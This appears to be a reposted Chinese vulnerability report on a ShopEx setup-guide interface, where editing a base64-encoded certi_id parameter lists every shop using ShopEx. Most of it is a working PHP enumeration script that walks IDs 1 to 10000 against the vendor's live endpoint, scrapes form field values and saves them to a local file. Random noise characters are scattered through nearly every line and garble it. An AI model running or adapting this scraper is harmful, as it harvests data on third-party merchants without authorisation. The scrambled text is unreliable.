|
|
简要描述:
6 \1 j8 k/ l& {. Q5 @! ^2 K% ]ShopEx某接口缺陷,可遍历所有网站
# Q/ |5 S6 A- U2 |详细说明:. G! X+ \- l0 g( d7 _, e
问题出现在shopex 网店使用向导页面
" {0 Q# @' a) e+ G* m/ H: ]0 x" `. c2 t$ u8 z& c
+ P$ b1 H, q u. W7 l; {
& M+ Z- ?* a6 U6 Z h( P- Shttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
& B" Z' x+ r- F1 h1 g+ c, `
/ E% a q9 e h0 }
. k; C$ P9 [ k) e6 u( |
0 H0 |; k8 t* p1 y8 Arefer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
4 S% z( {# l. T; E( l) @ `$ F2 p2 O- k( P2 j
2 Y2 _, S" ^9 f3 ]) m
9 I+ K* v( P4 W0 l我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 # `$ O2 j' u& ^ J; b/ c
0 m. I# A F4 r2 j5 u
8 H; ]' W! g% K: j- V# x% \3 H! P! b. ]9 J) F- J9 ?/ ?
<?php# D2 b R* Z/ A. [
+ Y+ Y$ X/ P2 o' Y. m
for ($i=1; $i < 10000; $i++) { //遍历7 R i7 \/ y/ Y- G& I! }
. Q1 K5 T2 h; b" m
ShowshopExD($i);
: T9 _: c& r. V7 ?! l' e0 ~- T
4 M# p/ P3 h6 u, ^" i* ` }0 B& c3 L8 M0 ^) M4 V5 H6 D
) v8 y6 D5 f& R+ \9 c function ShowshopExD($cid) {# [- r4 ]8 `2 R% |4 E2 X8 z
- ^4 x. k, R* S- c `% E $url='http://guide.ecos.shopex.cn/step2.php';- d$ }; r! x! a$ d
: n( A: y: }7 j* A) Z $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');! D: f! s! `) U
# g9 z9 O8 i1 G2 z $url = $url.'?refer='.$refer;) r4 n2 J6 j4 y/ G
9 ]& i" g( p& W& P# A $ch = curl_init($url);
/ n* f8 U# r& W7 K( p. {
; Z! ^4 y3 c2 S: H2 v curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;& J4 k, Y, E" b, n
( \& b' A7 P( o curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;2 b5 ^- C/ p% L. k1 d+ ]
* l, Q e3 q$ b! @- B
$result = curl_exec($ch);, V3 Z v4 M; ^' ]( k
3 f: q! z) e* R $result = mb_convert_encoding($result, "gb2312", "UTF-8");, k' @) p- z4 f1 \
/ t- N1 Y7 h+ `$ E5 B' q' g- o
if(strpos($result,$refer))
; j6 R: ]" |) F! W* [6 y
. }! W& A0 U1 U {. v6 Y. t$ z& M1 c6 z" a
9 f1 r& P2 u8 R% d! n8 _
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件9 U' S7 q& u- k* N2 Y/ x# n! G5 M
8 d+ D$ v: V1 E! _+ P V# ?3 I* K preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);: _; u% F+ e+ `' Y
) n/ r' d" ?9 O, Q" q( J" d
foreach ($value[1] as $key) {
' l& A5 `6 V s6 R. Z( _5 m0 S+ z
9 C. q) E: w6 X6 ~ preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);; c7 _; L9 X5 M9 Z8 O; L \
( h4 n+ ]/ Z( Q& x F) S echo $res[1][0].':'.$res[3][0]."\r\n";2 h% u/ M W7 Z
$ G7 z3 T' e. F& n% E# o/ J: h
$col =$res[1][0].':'.$res[3][0]."\r\n"; , k# Q& U5 H( E* p: O9 `1 S" g2 L
' o$ p" U; v, T2 o* x/ [; I- _* Q
fwrite($fp, $col, strlen($col)); 3 m! _4 n1 N% h; u$ X
* H4 i. E) L+ `% E4 j+ `
}) l7 z9 [% ^9 C" H1 N3 h" P7 b& M
9 S" T/ G3 r( J9 D echo '--------------------------------'."\r\n";+ V* S( L- ~+ u
% ]! U# ?* } T( H7 U% k
fclose($fp);
# S+ i2 h* X7 v# p% N% O3 o
+ _. z2 J& S7 h) n2 Z0 B/ k9 _ }1 ?0 f% l3 {: I+ L; U! u" t
2 K" N# F, n" ^# R5 q4 y+ E
flush();" G7 k- v `; p
1 Z# |$ O) S! J
curl_close($ch);) G+ U0 a N# S9 ?. B: s6 v
7 x9 C+ n, ?) t% S) t! Q
}! j. s9 d8 `2 j- y
5 v7 r) N% x9 ^; d0 d0 x, \?>
6 ?2 c8 ^6 G6 K3 R漏洞证明:5 L' A: l; Q0 H& S+ u# X
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg, e+ k6 u. b8 ]# b( ~0 ]9 T
refer换成其他加密方式/ G) e. M5 W& n9 B9 G1 J
|
|